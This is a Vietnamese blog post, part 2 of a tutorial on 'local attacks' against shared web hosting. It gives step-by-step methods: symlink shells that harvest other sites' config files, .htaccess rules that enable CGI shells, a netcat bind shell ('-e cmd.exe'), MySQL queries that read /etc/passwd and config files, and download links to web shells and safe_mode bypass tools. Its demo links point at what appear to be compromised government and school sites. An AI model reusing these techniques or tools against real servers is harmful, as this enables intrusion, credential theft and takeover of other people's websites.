Thứ Hai, 30 tháng 9, 2013

Tổng Hợp Các Phương Pháp Local Attack Thường Dùng(phan 2)



[​IMG]
- Vào link shell http://www.vksbinhphuoc.gov.vn/soleil/tmp/config.sa

- Coppy toàn bộ thông tin user có được từ câu lệnh: cat /etc/passwd vào khung như hình ảnh dưới đây rồi ấn “get config”

[​IMG]
- Cuối cùng trở lại link http://vksbinhphuoc.gov.vn/soleil/tmp/ , chúng ta sẽ có được danh sách các file config của các site trên server.
[​IMG]
* Đặc điểm của con shell get all config này:
+ Là 1 công cụ cực kỳ thuận tiện, giảm bớt thời gian và công sức khi local attack
+ Chỉ sử dụng đối với các server cho chạy shell cgi và cho quyền symlink
+ Không bypass được, chỉ symlink đối với các site chưa chmod và có path dẫn đến file config là mặc định.

6- Symbolink Root:
- Download file r00t.tar.gz về và upload lên host:
http://www.mediafire.com/?21kycoh4g5s4ojo ( pass download: soleil_vhb, pass dải nén: ceh.vn )
- Sau đó giải nén file root.tar.gz, sử dụng lệnh sau:
Tar –zxvf r00t.tar.gz
- Up file .htacess cùng thư mục với file r00t:
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
- Nếu không sủ dụng file r00t.tar.gz đó, có thể thực hiện sym root ngay trên shell
Demo:
http://tnmthatinh.gov.vn/soleil/r00t/

Và đây là cấu trúc của trường http://cdhh.edu.vn/
http://tnmthatinh.gov.vn/soleil/r00t/home/cdhh/public_html/

7- Backconnet:
Có thể hiểu đơn giản là kết nối bằng cổng sau, nghĩa là sử dụng shell backconnet và tool netcat (nc.exe) để mở sẵn 1 cổng trên server, sau đó từ máy tính của attacker kết nối với server qua cổng đã được mở sẵn đó. Mọi câu lệnh thực thi đối với server có thể thực hiện trên máy tính của attacker qua command line.
Đồ nghề cần thiết:
- Tool netcat (nc.exe)
http://www.mediafire.com/?npsob8c7dd9nr40
- Shell back connect đối với asp:
http://www.mediafire.com/?etciiuskzvyhjcw
Chú ý, trong shell có 1 đoạn code như: "G:\domains\tvled.vn\wwwroot\austdoor\design\nc.exe -l -p 1234 -e cmd.exe -d"
Lúc up shell lên cần edit lại “G:\domains\tvled.vn\wwwroot\austdoor\design\” thành path của server dẫn tới file nc.exe.
- Shell backconnet đối với php
http://www.mediafire.com/?8o1sj35cs51lsiw
( Pass unlock soleil_vhb; Pass dải nén: ceh.vn )
- Download tool nc.exe rồi đặt trong ổ C chẳng hạn, sau đó mở cửa sổ command line và sử dụng netcat để mở cổng trên local host kết nối với server đã mở sẵn cổng
- Cú pháp: + chế độ kết nối : nc [-tùy_chọn] tên_máy cổng1[-cổng2]
+ chế độ lắng nghe: nc -l -p cổng [-tùy_chọn] [tên_máy] [cổng]
Một số câu lệnh có thể sử dụng:
nc -nvv -l -p 80
nc -lvvnp 3333
nc -nvv -l -p 12345
nc 127.0.0.1 7777
nc -vv -l -p 7777
nc -vlp 443
+ -l: đặt netcat vào chế độ lắng nghe để chề kết nối đến
+ -n: Chỉ dùng ip ở dang số, ví dụ: 123.30.2.42, netcat sẽ ko xét đến DNS.
+ -p: Chỉ định cổng cần lắng nghe hay kết nối
+ -v: Hiện thi các thông tin về kết nối hiện tại. –vv sẽ hiện thị thông tin chi tiết hơn nữa.
- Lưu ý là cần coppy nc.exe vào 1 vị trí nào trong máy rồi sử dụng command đến thư mục chứa nc.exe trước khi thực hiện các câu lệnh liên quan đến netcat
- Sauk hi đã backconnect thành công thì tiến hành local đơn giản chỉ bằng 1 câu lệnh coppy shell từ site đã up được shell tới site victim.
8- Via SQL
- Login vào database và tạo 1 table để load các thông tin bằng cách sử dụng querry sau
create table soleil ( ducdung08clc varchar (1024));
- Query load các thông tin vào table table vừa được tạo:
load data local infile '/etc/passwd' into table soleil
Có thể thay câu lệnh “/etc/passwd” bằng path dẫn đến file config.
- Query hiện thị các thông tin được load vào table soleil:
select * from soleil
- Phương pháp này được gọi là Via SQL, chủ yếu sử dụng khi server không cho chạy run command và có thể bypass đối với 1 số server.
1 số lưu ý:
- Đối với 1 số server Safe_mod: ON, thì shel không có chức năng run command để thực thi các câu lệnh, vậy làm sao có thể local được. Giải pháp được nghĩ đến là sử dụng shell cgi:
[​IMG]
+ Soleil.pin
http://www.mediafire.com/?4k94v1i0shmr46c

Cách sử dụng:
- Up shell soleil.pin và chmod nó về 755
- Up hoặc tạo file .htaccess trong thư mục chứa shell có nội dung:
## START ##
Options +ExecCGI
AddHandler cgi-script cgi pl cgi gmc pin jpg
RewriteEngine on
RewriteRule (.*)\.mil$ $1.cgi
Options +FollowSymLinks
DirectoryIndex cmd.html
Options +Indexes
RemoveHandler .hack
AddType text/plain .hack
## milw0rmvn exploit ##

Hoặc:
Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .cin

AddHandler cgi-script .pin
AddHandler cgi-script .pin
+ telnet.pl
http://www.mediafire.com/?t9cavs1n0ipthq1

shell telnet.pl có chức năng hoàn toàn tương tự với con shell soleil.pin. Tuy nhiên cách thức sử dụng nó thì đơn giản hơn nhiều vì không phải sử dụng đến file .htaccess mà chỉ cần chmod nó về 755 là chạy được.
[​IMG]
( Pass unlock: soleil_vhb, pass dải nén nếu có : ceh.vn )
- * Đối với các server không có chức năng run command và cũng không cho chạy shell cgi thì có thể sử dụng các shell sau để bypass đơn giản đối với 1 số server.
+ fakesymlink.php
http://www.mediafire.com/?fc9kencnilx0rm4 ( 5.2.12 -> 5.3.1
http://www.mediafire.com/?kmid8rahl5wjh74 ( version 5.3 -> 5.4 )
+ 529bypass.php
http://www.mediafire.com/?cls0e5k873w83ef
+ Bypassnull.php
http://www.mediafire.com/?1x0zxmig5ctwezr

+ Hoặc sử dụng safe mode bypass
http://www.mediafire.com/download.php?38d13jgqw132db2

+ Sử dụng các chức năng bypass trên con shell r57vip này ( nên convert domain sang dạng ip)
http://www.mediafire.com/?sqjs5du3srlifqt

+ Hoặc sử dụng via sqli
v.v….
(Tất cả các shell download trên đều có pass unlock: vhb_soleil và pass dải nén nếu có: ceh.vn)
Trong bài tut trên soleil đã giới các phương pháp local attack cơ bản và các dạng bypass cơ bản nhất có thể sử dụng. Trong bài tiếp theo soleil sẽ đề cập đến các dạng bypass nâng cao đối với 1 số server khó, các thủ thuật vượt chmod qua 400 permission, chiếm quyền điều khiển root (get root) và các kỹ thuật up shell đối với 1 số mã nguồn mở như: joomla, worpress, nukeviet, vbulletin, drupal……

Không có nhận xét nào:

Đăng nhận xét